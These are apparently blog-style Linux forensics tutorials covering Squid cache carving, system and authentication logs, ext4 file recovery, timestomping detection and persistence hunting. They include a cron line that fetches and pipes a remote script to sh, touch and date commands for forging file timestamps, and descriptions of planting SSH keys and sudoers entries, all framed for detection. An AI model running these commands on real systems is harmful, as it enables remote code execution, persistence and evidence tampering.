All useful for understanding context like who clicked what, what browser they used, cache hits/misses, etc. 🔍 Starting Your Investigation – Log Hunting Let’s say you’re investigating activity around google.com . Start basic: grep google.com access.log Now you can narrow it down further. Want to see only GET or POST requests? grep "GET.*google.com" access.log Start building a timeline from here—this is your story-building phase in an incident investigation. ----------------------------------------------------------------------------------------------------------- 💾 Let’s Talk About Cache – One of the Juiciest Parts Squid caches web objects to speed things up. This means files , URLs , images , even docs might be sitting there waiting to be carved out. Default cache path: /var/spool/squid/ Here, cached files are stored in a structured format like: /var/spool/squid/00/05/000005F4 If you want to inspect these: grep -rail www.google.com /var/spool/squid/ Flags explained: -r: Recursively search -a: Treat files as ASCII -i: Case-insensitive -l: Show filenames only -F: Literal search (no regex overhead) Then use strings to dig deeper into the cache object: strings -n 10 /var/spool/squid/00/05/000005F4 | grep ^http | head -n 1 This gives you clean URLs that were cached. ----------------------------------------------------------------------------------------------------------- 📤 Extracting Actual Files from Cache Let’s say you found a cached .doc file and want to pull it out. Here's how: Find it: grep -rail file.doc ./ Example output: 00/0e/00000E20 Examine it: strings -n 10 00/0e/00000E20 Check for headers like: Content-Type: Cache-Control: Expires: This tells you what’s inside the file and why it was cached. Carve the file: Use a hex editor like ghex to open the file and locate the 0x0D0A0D0A byte pattern (that’s the HTTP header/body separator). Delete all the bytes before this pattern and save the result to a new file. Identify the file type: file carved_output If it says something like “Microsoft Word Document,” you’ve got your artifact extracted. Mission success! 💥 ----------------------------------------------------------------------------------------------------------- 🔗 Extra Resources You’ll Love Want to keep up with new tools for analyzing Squid? Bookmark this: 👉 Squid Log Analysis Tools List (Official) And don’t forget to explore another gem: 👉 SquidView Tool – Neat for interactive visual log analysis. ----------------------------------------------------------------------------------------------------------- 🧠 Final Thought Log and cache analysis in Squid isn't just about reading boring log lines. It's storytelling through network artifacts. From timestamps to URLs, from GETs to cached DOC files—every bit tells you something. The trick is not just knowing what to look for—but knowing how to get it out. If you're starting your journey with Squid forensics, this is your friendly roadmap. And hey, the more you do it, the more patterns you start seeing. It becomes second nature. ---------------------------------------------Dean----------------------------------------------------------
Understanding Linux: Kernel Logs, Syslogs, Authentication Logs, and User Management
Alright, let’s break down Linux user management, authentication, and logging in a way that actually makes sense, especially if you’ve been on both Windows and Linux systems. 🔑 1. Unique Identifiers in Linux vs Windows First off, let’s talk about how users are identified: Windows uses SIDs (Security Identifiers) — long strings like S-1-5-21-... to uniquely identify users. Linux , on the other hand, uses UIDs (User IDs) for users and GIDs (Group IDs) for groups. 👉 Quick Tip: Regular user accounts start from UID 1000 and above. Anything below 1000 is usually a system or service account (like daemon, syslog, etc.). 📂 2. Where Is User Info Stored in Linux? 🧾 /etc/passwd This file holds basic user info : username , UID , GID , home directory , and shell (like /bin/bash or /usr/sbin/nologin). cat /etc/passwd You'll see entries like: akash:x:1001:1001:Akash,,,:/home/akash:/bin/bash 🔐 /etc/shadow This one is where the actual (hashed) passwords are stored — not in /etc/passwd. It’s restricted to root for a reason. sudo cat /etc/shadow You’ll notice hashed passwords that look something like this: akash:$6$randomsalt$verylonghashedpassword:19428:0:99999:7::: That $6$ means it’s hashed using SHA-512 . Other common password hashing algorithms in Linux: MD5 , Blowfish , SHA-256 , and SHA-512 . All of these use salting and multiple hashing rounds for added security. 👥 3. Managing Users in Linux (Commands You’ll Actually Use) Here are the most common commands: Command What It Does useradd Add a new user userdel Remove a user usermod Modify user properties chsh Change a user’s default shell passwd Set or change a user's password All of this ties into how Linux handles access and sessions. 🛡️ 4. How Linux Handles Authentication (Thanks to PAM) PAM stands for Pluggable Authentication Modules — and it’s the brain behind how Linux checks your credentials. 🗂️ Where are the PAM config files? /etc/pam.d/ : Main directory for PAM config files for individual services (like sshd, login, sudo, etc.) /etc/security/access.conf : You can use this to allow or deny users based on IP, group, etc. Example: -:akash:ALL EXCEPT 192.168.1.100 This means Akash can only log in from the IP 192.168.1.100. 🧩 PAM Modules Location These are .so files (shared object libraries) that do the heavy lifting. RHEL-based distros : /usr/lib64/security/ Debian-based distros : /usr/lib/x86_64-linux-gnu/security/ Think of them like Linux’s version of Windows DLLs but for authentication logic. 🔄 How PAM Authentication Works (Step by Step) User enters credentials (username + password). System loads PAM config from /etc/pam.d/*. Relevant modules get called from /usr/lib/.... Password is compared with the hash in /etc/shadow. If valid , session gets started. Authentication logs are written — usually in /var/log/auth.log or /var/log/secure. Access is granted or denied . Simple but powerful. --------------------------------------------------------------------------------------- 📜 5. Logging – Where to Look 🗂️ Where Does Linux Log Authentication Stuff? Linux keeps logs under the /var/log/ directory — that’s the central place where you’ll find all sorts of system and user-related logs. 1. /var/log/auth.log (Debian/Ubuntu systems) This is your go-to file when investigating: Logins via terminal, SSH, or sudo Session starts/stops Authentication failures and successes Use tail -f /var/log/auth.log to monitor real-time logins.For older, compressed logs, use: zcat /var/log/auth.log.1.gz. Also, fun fact: cron job logs land here too, because cron has to authenticate users before running scheduled tasks. 2. /var/log/secure (Red Hat/CentOS/Fedora systems) Same purpose as auth.log but without cron logs. So if you’re hunting down brute-force attempts or failed SSH logins on RHEL or CentOS, this is your place. 3. /var/log/failog This one specifically logs failed login attempts , but here’s the twist: On Ubuntu/Debian, it’s there, but only if you configure pam_faillock. On RHEL-based systems, it’s often not enabled by default. Use faillog -a to check all failed attempts. 4. /var/log/lastlog Want to know when a user last logged in? Boom — this file’s got you covered. Run lastlog -u akash to check last login time for user akash. Neat for checking dormant accounts or for basic auditing. 5. /var/log/btmp This file tracks failed login attempts , but it’s in binary format — so don’t try to cat it like a text file. Use lastb or lastb -f /var/log/btmp to view it cleanly. 6. /var/log/wtmp It logs all login/logout events, system reboots, and shutdowns. Run last to read it.Or for a forensic dump from a dead system: last -f /mnt/disk/var/log/wtmp 7. /run/utmp This file is more “live.” It tracks users currently logged in . Use who or w to view who's online right now. 🔍 How Long Are Logs Kept? Linux usually keeps logs for 4 weeks by default, rotating them weekly. Older logs get compressed (you’ll see .gz files). So for deeper dives: Use zcat or zless to view archived logs Use strings, hexdump, or a hex editor to read binary logs like btmp, wtmp, or utmp in raw forensics scenarios 🧪 Quick Command Recap Command Purpose last Shows logins/logouts from /var/log/wtmp lastb Shows failed logins from /var/log/btmp faillog -a View all failed login attempts who / w Shows currently logged-in users (from utmp) lastlog -u user Shows last login info from lastlog 🧠 Bonus: How Syslog and Kernel Logging Works in Linux Let’s talk Syslog — the backbone of Linux logging. Syslog isn’t a file — it’s a standard protocol used by system processes to send log messages to a log server (or local file). It’s used across services, from SSH to cron, and it categorizes logs by: Facility (like auth, kernel, daemon) Severity (info, warning, error, critical) Common Syslog Implementations: rsyslog (most common these days) syslog-ng journald (used with systemd) 🗂️ Key System Log Files 1. /var/log/syslog (Ubuntu/Debian) This is like a catch-all system log . You’ll find: Kernel messages App-level logs Cron logs Hardware issues It’s super useful when you’re not sure what exactly went wrong but want a timeline of everything. Use tail -f /var/log/syslog or grep through it to find events. 2. /var/log/messages (RHEL/CentOS/Fedora) Think of this as the Fedora-flavored syslog . It logs similar data — services, kernel messages, application errors — but it’s the default log file for those distros. Want to Go Pro Mode? You can even forward logs to a central log server using rsyslog or syslog-ng. Perfect for SIEM integration or enterprise setups. 🚨 Tip: Watch Those Binary Logs Files like wtmp, btmp, and utmp are not plain-text , so don’t expect to read them with cat. Either use the right commands (last, lastb, who, etc.) or open them in a hex editor when you’re in full forensic mode. --------------------------------------------------------------------------------------- Let’s talk about something super important but often overlooked — kernel logs in Linux . These logs are goldmines when it comes to diagnosing system-level problems like driver issues, boot errors, or hardware failures. But if you're like most people, kernel logging might feel a bit messy because of the variety of tools and file paths involved across distros. So, let's break it all down in plain language. 🧠 First Things First — What’s dmesg All About? The dmesg command is your go-to tool when you want to see what the Linux kernel has been up to — especially right after booting. It shows stuff like: Hardware detection Driver loading Device initialization (like USBs, disks, network interfaces) Boot-time errors Basically, if something is going wrong at the very core of your OS — this is where you'll see the first red flags. 🔧 How to Use It? Just pop open a terminal and run: dmesg You’ll see a big wall of text. You can pipe it to less or grep for easier viewing: dmesg | grep -i error Now here’s the catch: this output comes from the kernel ring buffer — which is in memory. That means once the system reboots, poof — it’s gone unless you’ve saved it. 📁 But Wait — Where Is This Stuff Saved? On some distros, it actually is saved! 🗂️ /var/log/dmesg (Only on Some Systems) This file captures the output of dmesg from the last boot and stores it permanently. You can just run: less /var/log/dmesg But don’t count on it being available on all systems. For example: Debian/Ubuntu: You’re likely to find it. Fedora/RHEL/Rocky: Nope. They use journald instead (more on that in a sec). 📚 Enter /var/log/kern.log — The Persistent Hero Now this one’s interesting. The kern.log file contains all kernel messages — just like dmesg — but it sticks around even after rebooting. That means you can go back and check what the kernel was doing a week ago if your system started acting weird after an update or new hardware installation. View it like this: less /var/log/kern.log 🕒 Bonus: Time Stamps Unlike the raw dmesg output that shows uptime seconds (like [ 3.421546]), the messages in kern.log come with real human-readable timestamps , making it way easier to match with user events. 🧰 What About Fedora, RHEL, Rocky Linux? Alright, now let’s talk Fedora-style distros . They’ve moved away from traditional log files and now rely heavily on systemd's journald service . So files like /var/log/kern.log or /var/log/dmesg? You won't find them here. Instead, everything is logged into the system journal . ✅ How to View Kernel Logs? journalctl -k That gives you only kernel logs from the journal. Super clean, super easy. You can also use filters like: journalctl -k --since "2 days ago" --------------------------------------------------------------------------------------- 💾 Persistent vs Non-Persistent Logs (This Is Crucial!) Systemd-based distros can either store logs in memory (volatile) or on disk (persistent). Whether or not your logs survive reboot depends on how journald is set up. If logs are stored in /var/log/journal, they’re persistent . If not, and only in /run/log/journal, they’re gone after reboot . So if you're doing forensics on a deadbox, you’d better hope /var/log/journal exists. --------------------------------------------------------------------------------------- 💀 Deadbox Log Hunting Tips If you're working on a dead system and trying to dig into what happened before it went down: Mount the disk using a live CD or forensic OS. Navigate to /var/log/journal/ if it exists. Use journalctl --directory=/mount/path/var/log/journal to view the logs. If nothing's there? You're kinda outta luck unless you've got other artifacts like /var/crash/, old syslog exports, or even swap memory to analyze. --------------------------------------------------------------------------------------- 🔚 Final Thoughts Whether you’re on a live system , doing forensics , or trying to fix a misbehaving server, don’t forget: Logs don’t lie — you just need to know where they’re hiding. --------------------------------------Dean------------------------------------------
Linux File System Analysis and Linux File Recovery: EXT2/3/4 Techniques Using Debugfs, Ext4magic & Sleuth Kit
When you're digging into Linux systems, especially during live forensics or incident response, understanding file system behavior is crucial. The ext4 file system is commonly used , and knowing how to read file timestamps properly can give you a solid edge in an investigation. Let's break it down in a very real-world , 🔹 1. Basic ls -l — Let’s Start Simple When you run: ls -l You get a list of files along with a timestamp. That timestamp? It’s the modification time (mtime) . That’s the default. If you're like me and wondering, "What if I want to see when a file was last accessed or changed in metadata?" , then you’ve got options. 🔹 2. Customize the Time Display (atime, ctime, etc.) Use --time= to get the info you care about: ls -l --time=atime # Shows last access time ls -l --time=ctime # Shows inode change time Note: c time is not "creation time" (confusing, I know). It's the time when metadata (permissions, ownership, etc.) changed. Want to know what time options ls supports? Just check: man ls 🔹 3. Can We See File Creation Time on ext4? Now here’s where it gets interesting — and a bit annoying. ext4 can support birth time (aka creation time) , but not all Linux distros expose it by default via normal tools. Some versions of ls, stat, or even the filesystem itself may not record it. So how do we go deeper? That’s where the magic of debugfs comes in. 🔹 4. stat Command — Detailed File Info Quick and handy: stat You’ll see Access, Modify, Change times and creation time as well . But again, Sometimes no creation time . Sad life 😅. 🔹 5. Using debugfs to Dig Deeper (Finding Birth Time or Inode Info) When you’re doing live response and the system won’t give you birth/creation time using stat, this is your go-to: sudo debugfs -R "stat " /dev/ ⚠️ You need the device name where the file system is mounted. How to find the device name? Use: df or df -h Sometimes you might find something like /dev/sdc or /dev/mapper/ubuntu--vg-root if LVM is used. Also check /etc/fstab: cat /etc/fstab This shows all persistently mounted devices, useful when the system uses LVM or /dev/mapper. Sometimes it’ll look like: /dev/disk/by-id/dm-uuid-LVM-... ✅ Example Use Case: Let’s say I want to check creation time for /var/log/syslog. Run: sudo debugfs -R "stat /var/log/syslog" /dev/sdc Boom! You'll now see: Inode Size Access time Modify time Change time Creation time (if available!) This is not the same stat command we used earlier. This one is a debugfs internal command . 🔹 6. Using debugfs in Interactive Mode You can drop directly into debugfs with: sudo debugfs /dev/sdc Once inside, you’re in a shell-like environment. Just run: stat /home/akashpatel/arkme No need for -R here — you're already inside. 🔹 7. Want Inode Number First? Sometimes, you want to grab the inode of a file before using debugfs. You can do this: ls -i /home/akashpatel/arkme Now if you’ve got an inode like 123456, and you're inside debugfs, just run: stat <123456> Or even: cat <123456> (Yeah, cat also works in debugfs!) 🔹 Pro Tips: Always double-check you’re using the right device — especially with forensic images or LVM setups. debugfs is super powerful, but read-only usage is safest in live forensics (avoid writing to the file system!). If you get errors running debugfs, make sure the device isn't actively in use or try accessing a mounted image instead. In a nutshell: Command What It Shows ls -l mtime (default) ls -l --time=atime Access time ls -l --time=ctime Metadata change time stat mtime, atime, ctime, crtime(sometimes) debugfs -R "stat " /dev/... Shows all 4 timestamps including birth time (if supported) debugfs (interactive) Explore with inode numbers, use stat, cat, etc. ------------------------------------------------------------------------------------------------------------- Lets Suppose You accidentally delete a super important file on a Linux system running an ext2/ext3/ext4 filesystem. The panic hits, right? But don’t worry—I’ll walk you through how to recover it using a mix of tools like debugfs , ext4magic , and Sleuth Kit . 🧰 1. Recover Deleted Files Using debugfs (Works Best on EXT2) If the f ilesystem is ext2 , then debugfs is your best buddy . It's got this neat command called lsdel that lists recently deleted files. 🔧 Basic Workflow Launch debugfs : sudo debugfs /dev/sdX Replace /dev/sdX with your actual device (e.g., /dev/sdc). List deleted files : lsdel Or: list_deleted_inodes You’ll get inode numbers of deleted files. Pick the one you want. View inode details : stat Preview content (yes, you can peek!): cat Recover the file : dump /desired/output/path/ 💡 Heads-up : This method is mostly for ext2 filesystems. Why? Because ext3 and ext4 clean up the data blocks after deletion , which makes recovery harder directly. ------------------------------------------------------------------------------------------------------------- 🧠 2. Recovery on EXT3 and EXT4 (Using Journal + ext4magic Tool) Now here’s where it gets a bit more interesting. With ext3/ext4, things aren’t that simple because once a file is deleted, the inode is wiped out. But all hope isn’t lost—we go after the journal . 🔒 Journal’s Inode is Always 8 Yup. To grab the journal: debugfs /dev/sdc dump <8> /path/to/save/journal.dump 🚀 Use ext4magic for Real Recovery This tool is specially made to deal with journal-based recovery. Install it if you haven’t: sudo apt install ext4magic 🛠️ Basic Command: sudo ext4magic /dev/sdc -j /path/to/journal.dump -m -d /path/to/recovery_folder Flags explained: -j: Path to journal dump file -m: Recover ALL deleted files -d: Where to store recovered files -a or -b: Time-based filtering (after/before a specific time) 🎯 Example: Recover files deleted in the last 6 hours ext4magic /dev/sdc -a "$(date -d "-6hours or -7days" +%s)" -j journal.dump -m -d ./recovered 💬 This gives you super fine control over what to recover. It’s way better than randomly guessing. Recovered Files ------------------------------------------------------------------------------------------------------------- 🔍 3. Sleuth Kit Magic – Inspect and Recover Like a Forensics Expert If you’re digging into a disk image , maybe from a compromised system or raw forensic capture, you’ll want to mount it and go deeper. 🧱 Mount the Image (Linux or WSL) sudo mkdir /mnt/test sudo mount -o ro,loop /path/to/linux.raw /mnt/test Now run: df Note down the mounted device name (e.g., /dev/loop0 or /dev/sdc). 🔎 Key Sleuth Kit Commands 1. fsstat – Filesystem Overview sudo fsstat /dev/sdc 2. fls – List Deleted Files (and More!) sudo fls -r -d -p /dev/sdc -r: Recursive -d: Deleted entries -p: Show full path 3. istat – Inode Metadata sudo istat /dev/sdc 4. icat – View File Content by Inode sudo icat /dev/sdc Perfect for checking the content of deleted files even if they don’t show up in the normal file tree. 🌀 Filesystem Journal Analysis with Sleuth Kit Sometimes, you want to peek into journal entries directly. Here’s how: 1. jls – List Journal Blocks sudo jls /dev/sdc | more 2. jcat – View Journal Block Content sudo jcat /dev/sdc This is raw, low-level stuff—but crucial when traditional recovery methods fall short. ------------------------------------------------------------------------------------------------------------- 📦 Bonus: File Carving with photorec If you’re like “Just give me all the lost files!”, then photorec is your hero. Install it: sudo apt install testdisk Run it: sudo photorec Just point it to your image or device, choose the file types you want to recover, and it does the rest. It’ll carve out all files it finds—even if directory info is gone. (Very Simple just follow the commands it shows) 🔍 Final Tip: Search Within Recovered Files Once you recover everything, you might want to search for a specific string, like an IP address or username: grep -Rail -a "192.168.1.10" ./recovered The -a treats binary files as text, which is super helpful during deep dives. ✅ Wrapping Up So, whether you’re on a forensic case or just accidentally nuked your presentation file, these tools have your back. Just remember: Use debugfs for ext2 . Use ext4magic + journal for ext3/ext4 . Use Sleuth Kit for image-based investigation. And photorec when you’re ready to say “Recover ALL the things!” -------------------------------------Dean---------------------------------------------------
Timestomping in Linux: Techniques, Detection, and Forensic Insights
------------------------------------------------------------------------------------------------------ Before we dive into timestomping on Linux, a quick note: I've already written a detailed article on timestomping in Windows , where I covered what it is, how attackers use it, and most importantly— how to detect it effectively . If you're interested in understanding Windows-based timestomp techniques and detection strategies, make sure to check out the article linked below: 👉 https://www.cyberengage.org/post/anti-forensics-timestomping Now, let’s explore how timestomping works on Linux systems and what you can do to uncover such activity. ------------------------------------------------------------------------------------------------------ Let’s talk about something that often flies under the radar in Linux investigations— timestomping . If you’re into forensics or incident response, you’ve probably come across files where the timestamps just don’t seem right. Maybe a malicious script claims it was modified months before the attack even happened. Suspicious, right? That’s timestomping in action. 🔧 So, What Exactly Is Timestomping? Timestomping is a sneaky little trick attackers use to manipulate file timestamps in order to hide their activities. Basically, they change the "last modified," "last accessed," or even "created" dates of files, so things don’t look out of place during an investigation. Here are the four main timestamps you’ll see in Linux: atime – last time the file was accessed mtime – last time the content was modified ctime – last time metadata (like permissions) changed crtime – file creation time (only visible on some filesystems like ext4, and not easily accessible) The goal is simple: blend in . If the file looks like it’s been sitting around for months, maybe you won’t look at it twice. 🛠️ The Classic Way: Using touch in Linux The most common and dead-simple way to timestomp in Linux is with the touch command. 🧪 Basic Syntax: touch -t [YYYYMMDDhhmm.ss] file 🎯 Some Practical Examples: Set a custom access & modification time: touch -t 202501010830.30 malicious.sh Change only the access time: touch -a -t 202501010101.01 report.log Change only the modification time: touch -m -t 202501010101.01 report.log ❗ Important Note: touch cannot change ctime or crtime . That’s metadata Linux protects more tightly. ------------------------------------------------------------------------------------------------------------- 🧠 Pro Trick: Copy Timestamps from Another File Want to make one file mimic another? touch -r /home/akash/legitfile suspiciousfile Now suspiciousfile will have the same access and modification times as legitfile. Handy for blending in! 👀 But... Can We Detect This? Yes. Even though timestomping is subtle, there are a few tells if you know what to look for. 🕵️‍♀️ 1. Subsecond Precision = 0? Run stat on the file: stat suspiciousfile If you see nanoseconds like .000000000, it might’ve been altered using touch—since manual timestamps usually don’t include fine-grained precision. ----------------------------------------------------------------------------------------------------------- ⏳ System Time Manipulation: Another Sneaky Method Here’s another trick some attackers use—they change the system clock to backdate files. 🧪 How it Works: Turn off NTP (time syncing): sudo timedatectl set-ntp false Set a fake date/time: sudo date -s "1999-01-01 12:00:00" Create or drop your malicious files: touch payload.sh Restore the actual time: sudo timedatectl set-ntp true Now those files look like they were created in 1999—even though they were dropped minutes ago. 🔍 Real-World Detection Tips Here’s how we can catch these kinds of timestamp games: 📋 1. Command Monitoring Keep an eye on suspicious commands in your logs: touch -t touch -r date -s timedatectl hwclock 🧭 2. Timeline Inconsistencies Does a file’s mtime predate surrounding system events? Is ctime suspiciously newer than atime/mtime ? Are there clusters of files all modified at the same weird timestamp? Use stat to dig into these or check timelines with forensic tools (more on that below). 🛠️ Forensic Tools That Can Help Here are some tools I often use when digging into possible timestomping: auditd – Can log file events and command execution (like touch, date) Sysmon for Linux – A great way to track suspicious process activity Plaso / log2timeline – My go-to for creating timelines and spotting weird timestamp gaps Velociraptor – Awesome for live hunting across multiple systems Eric Zimmerman's Tools – These are more for Windows, but worth mentioning if you’re working across platforms or with NTFS images 🔚 Final Thoughts Timestomping isn’t flashy—but it’s effective. That’s what makes it dangerous. A single altered timestamp can throw off your entire investigation if you’re not paying attention. But once you know what to look for—whether it's zeroed-out nanoseconds, unusual ctime, or oddly-timed files—you can start to see through the smoke and mirrors. Stay curious, stay forensic. 🕵️‍♂️ ------------------------------------------------------------Dean--------------------------------------------
Understanding Linux Service Management Systems and Persistence Mechanisms in System Compromise
Before I start, I have already touched on persistence mechanism in article (Exploring Linux Attack Vectors: How Cybercriminals Compromise Linux Servers) If you want you can check it out link below: https://www.cyberengage.org/post/exploring-linux-attack-vectors-how-cybercriminals-compromise-linux-servers --------------------------------------------------------------------------------------------------------- Understanding init.d and systemd Service management in Linux has evolved significantly over the years, transitioning from traditional init.d scripts to the more modern systemd system . Both play crucial roles in starting, stopping, and managing background services (daemons), but they differ greatly in functionality, design, and usability. init.d: The Traditional System The init.d system has historically been the backbone of Linux service management. It consists of shell scripts stored in the /etc/init.d directory , each designed to control the lifecycle of a specific service. Common Commands Service management through init.d typically involves: start – Launch the service stop – Terminate the service restart – Stop and start the service again status – Check if the service is running Limitations Despite being widely used for years, init.d has several limitations: Lack of standardization: Script behaviors can vary widely No built-in dependency handling: Scripts must manually ensure other services are available Slower boot times due to serial service initialization Runlevels Runlevels define the state of the machine and what services should be running: 0 – Halt 1 – Single user mode 2 – Multi-user, no network 3 – Multi-user with networking 4 – User-defined 5 – Multi-user with GUI 6 – Reboot Management Tools Depending on the Linux distribution: Debian-based systems: Use update-rc.d to manage services Fedora/RedHat-based systems: Use chkconfig for the same purpose Script Location /etc/init.d – Main l ocation for service scripts systemd: The Modern Standard Introduced in 2010, systemd was designed to overcome the shortcoming s of traditional init systems. Although initially controversial, it has since become the default service manager in most major Linux distributions. Advantages Parallelized startup for faster boot times Dependency management between services Integrated logging through the systemd-journald service Standardized unit files replace disparate shell scripts Unit Files Instead of shell scripts, systemd uses declarative unit files to define how services should behave . These files can be of different types, such as: *.service – Defines a system service *.socket – Socket activation *.target – Grouping units for specific states (like runlevels) Unit File Locations /etc/systemd/system/ – Local overrides and custom service files /lib/systemd/system/ – Package-installed units (symlinked to /usr/lib/systemd/system on some distros) /usr/lib/systemd/system / – Units installed by the operating system --------------------------------------------------------------------------------------------------------- systemd Timers vs Cron Jobs When it comes to establishing persistence on a Linux system, attackers and administrators alike have a range of tools at their disposal. Two commonly used scheduling mechanisms are systemd timers and cron jobs. Both serve the purpose of executing tasks at predefined intervals, but they differ in structure, control, and usage. Let’s take a closer look at each. systemd Timers With the adoption of systemd in most modern Linux distributions, systemd timers have emerged as a powerful and flexible way to schedule tasks . Much like Windows Scheduled Tasks, these timers can initiate background services at specific times or intervals. How They Work Systemd timers work in tandem with systemd service units. Typically, a timer will have a corresponding service file. For instance: data_exfil.timer → triggers data_exfil.service However, you can also explicitly define the service to trigger by adding Unit=custom.service in the .timer file. Key systemd Timer Commands: For managing systemd timers on a live system, use the following: Enables the timer to start at boot systemctl enable .timer Starts the timer immediately. systemctl start .timer Displays the current status, including the last and next trigger times. systemctl status .timer Why Use systemd Timers? Granular control over execution intervals Integration with other systemd features (dependencies, logging, etc.) More readable and maintainable compared to complex cron entries 2. Cron Jobs Cron has long been the go-to tool for task scheduling in Unix and Linux environments. It’s simple, reliable, and nearly universal. Format: <*> <*> <*> <*> <*> <*> :- minute (0 - 59) <*> :- hour (0 - 23) <*> :- day of the month (1 - 31) <*> :- month of the year (1 - 12) <*> :- day of the week (0 - 7; 0/7 = SUN) ( * )=wildcard for any value ( , )= list multiple values ( - )= specify a range ( / )= set increments within a range How It Works Cron jobs are defined in crontab files, which contain entries with six fields: /30 * wget -q -O - /attack.sh | sh This example runs a command every 30 minutes, silently fetching and executing a remote script — a classic example of how cron can be used maliciously. Crontab Commands Use these on a live system to inspect cron jobs: Lists current user’s cron jobs. crontab -l Cron File Locations On Debian-based systems, cron-related files are typically found in: /var/spool/cron/crontabs – per-user cron jobs /etc/cron.d/, /etc/cron.daily/, /etc/cron.hourly/ – system-wide jobs Why Use Cron? Universally supported across Unix-like systems Lightweight and straightforward Does not require systemd --------------------------------------------------------------------------------------------------------- Other Persistence Mechanisms 1. SSH as a Persistence Mechanism SSH is one of the most reliable methods for attackers to maintain persistent access to a compromised system. There are two primary types of SSH authentication mechanisms: password-based and key-based . While password-based authentication is common, key-based authentication is often favored for persistence due to its robustness and ease of use. How It Works: An attacker generates a public/private key pair on their own machine and then places the p ublic key into the victim system’s ~/.ssh/authorized_keys file . This allows them to authenticate to the system without needing to provide a password. Key-based SSH authentication is popular because once set up, the attacker can access the system remotely and continuously, even if the initial password is changed. To check for this persistence, system administrators should audit the following locations: /home//.ssh/authorized_keys If an unfamiliar key is present, it could indicate unauthorized access. 2. Bash Configuration Files Another method for creating persistence on a compromised system involves manipulating Bash configuration files . These files are typically executed when a user logs into a Bash shell, making them ideal for executing malicious scripts or commands automatically. Key Files to Review: Per-User Files: /home//.bashrc /home//.bash_profile These files are executed each time a user opens a new terminal session. If an attacker has modified these files, they may have inserted a script to run malicious commands. Other Per-User Bash Files: /home//.bash_login /home//.bash_logout These files are also executed during user login and logout events. Any modifications should be carefully reviewed. System-Wide Files: /etc/bash.bashrc /etc/profile /etc/profile.d/* The system-wide configuration files affect all users and may contain attacker's code or scripts. Check the modification timestamps for any unexpected changes. rc.local: /etc/rc.local (if it exists) This file, if present, runs scripts at system startup. While it might not exist by default on all systems, attackers can create it and add malicious commands to execute on boot. 3. udev Rules udev is a device manager for the Linux kernel, responsible for managing device nodes in /dev. Attackers can exploit this by creating custom udev rules to trigger scripts based on hardware events, such as when a USB device is connected . Key Files to Check: /etc/udev/rules.d/ Review the files in this directory for any new or suspicious rules that might automatically execute a script when specific hardware is connected (e.g., a USB stick). 4. XDG Autostart On systems with a graphical user interface (GUI), attackers may place scripts in directories related to XDG autostart . These scripts are automatically executed when the desktop environment starts, ensuring that malicious processes are launched every time the user logs in. Key Files to Review: System-Wide: /etc/xdg/autostart/ Per-User: /home//.config/autostart/ Any unfamiliar script in these directories could be a sign of persistent malware that runs whenever a user logs into the graphical environment. 5. Network Manager Scripts The NetworkManager is responsible for managing network connections on Linux systems. Attackers can exploit this system by placing scripts in the NetworkManager's dispatcher directory to trigger actions during network events, such as when a specific network interface comes online. Key Files to Review: /etc/NetworkManager/dispatcher.d/ Scripts in this directory are executed whenever there are changes to network interfaces. Reviewing these files can reveal hidden scripts designed to execute during network events. 6. Modifying Sudoers for Elevated Privileges Attackers often modify system configurations to ensure they can escalate privileges or maintain administrative access. One way to do this is by editing the sudoers file, which controls which users can run specific commands as root . Example Sudoers Entry: ALL=(ALL:ALL) ALL This entry allows any user to execute any command as any other user, including root. Attackers might add themselves to this file to gain elevated privileges at will. To check for unauthorized changes: Use sudo vi to safely edit and inspect the /etc/sudoers file. Look for unusual users or commands in the sudoers file that could grant an attacker unrestricted access. --------------------------------------------------------------------------------------------------------- Conclusion Persistence is a critical phase of the attack lifecycle. A comprehensive security audit should include checking not just user accounts and SSH keys but also background services, startup scripts, scheduled tasks, and even device event triggers. By understanding the various persistence mechanisms — from traditional cron jobs to modern systemd timers — security professionals can more effectively hunt, detect, and respond to adversarial activity before it escalates into a bigger breach. Key Takeaway: Effective persistence hunting means combining file integrity monitoring , service auditing , and user account audits into a regular security strategy. ------------------------------------------Dean----------------------------------------------------------